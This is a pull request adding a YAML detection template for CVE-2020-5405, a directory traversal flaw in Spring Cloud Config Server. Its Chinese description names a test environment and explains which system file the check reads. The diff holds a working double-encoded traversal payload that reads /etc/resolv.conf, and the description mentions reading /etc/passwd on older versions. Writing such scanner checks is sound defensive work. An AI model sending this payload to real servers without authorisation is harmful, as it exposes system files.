### PR TITLE
add: spring-cloud-cve-2020-5405.yml

### DIFF
--- a/pocs/spring-cloud-cve-2020-5405.yml
+++ b/pocs/spring-cloud-cve-2020-5405.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-spring-cloud-cve-2020-5405
+rules:
+  - method: GET
+    path: >-
+      /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit."))
+
+detail:
+  version: <= 2.1.6, 2.2.1
+  author: kingkk(https://www.kingkk.com/)
+  links:
+    - https://pivotal.io/security/cve-2020-5405
+    - https://github.com/spring-cloud/spring-cloud-config


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
cve-2020-5405
spring-cloud-config-server 目录穿越漏洞

## 测试环境
https://github.com/shadowsock5/spring-cloud-config-starter

## 备注
2.1.x的版本可以读取/etc/passwd
2.2.x的版本读取的文件必须要有后缀，对比了下虚拟机和docker环境中都存在的文件，最后选择了`/etc/resolv.conf`